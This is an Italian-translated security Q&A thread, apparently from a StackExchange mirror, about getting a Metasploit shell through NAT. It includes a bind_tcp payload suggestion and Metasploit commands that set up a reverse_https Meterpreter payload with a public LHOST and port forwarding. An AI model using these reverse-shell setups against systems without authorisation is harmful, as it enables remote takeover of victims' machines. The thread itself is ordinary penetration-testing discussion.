Metasploit Ottieni shell tramite NAT

4

Ok, prima di tutto questo è legale e ho scritto per iscritto che il mio amico e io ci stiamo attaccando per migliorare e non infrangere la legge.

Impostazioni Ho un'immagine VMWare che esegue BT5R3. Utilizza il NAT di VMWare, quindi la mia rete si trova dietro un router che utilizza NAT. Da lì sono VPN tunneled in lavoro che utilizza anche NAT (credo). Mi sono reso conto che ho sempre eseguito metasploit dall'interno o in un laboratorio ma mai su Internet.

Domanda
Sono abbastanza sicuro che con questo scenario non sarebbe possibile un carico utile inverso in quanto richiede che la macchina mi ricolleghi. Funzionerà con qualsiasi carico utile?

    
posta Four_0h_Three 16.07.2013 - 14:54
fonte

2 risposte

3

Questo non funzionerà con i payload inversi a meno che non sia possibile eseguire il portforwarding sul sistema che esegue il NATing del traffico. Quindi è meglio generare un payload che ti permetta di connetterti ad esso piuttosto che un payload che si connette (ma se il tuo target usa anche NAT, anche questo diventa obsoleto). Ad esempio:

shell/bind_tcp

Questo crea problemi se c'è un firewall tra te e il bersaglio. La cosa migliore da fare è portare via il NAT completamente se possibile. Nel tuo caso questo sembra abbastanza difficile ...

    
risposta data 16.07.2013 - 15:14
fonte
-1

Puoi usare meterpreter/reverse_https e impostare LHOST sul tuo IP pubblico. Assicurati di inoltrare la porta 443 alla macchina che ospita metasploit.

set payload windows/meterpreter/reverse_https
set LPORT 443
set LHOST YOUR PUBLIC IP

"Since our attacker host is behind NAT, we have to use the public IP address of the router/firewall as LHOST. When the exploit is executed, this IP will be embedded in the shellcode and when the initial Meterpreter shellcode runs on the target, it will connect back to this IP address. The port forwarding on our router/firewall will then forward traffic to our LAN IP of the attacker host. For this reason, we need to set LHOST to 1.1.1.1 (the public IP of your attacker router/firewall)

Using a public IP as LHOST also means that Metasploit will attempt to bind itself to that IP when setting up the Meterpreter handler. Since this IP belongs to the router/firewall and not to the Metasploit instance, this will obviously fail. The good thing is that Metasploit will automatically fall back to 0.0.0.0 and basically serve the Meterpreter handler on all local IPs on the attacker host, while remembering that LHOST was set to our public IP address. This is exactly what we need."

Fonte: link

    
risposta data 15.08.2015 - 04:37
fonte

Leggi altre domande sui tag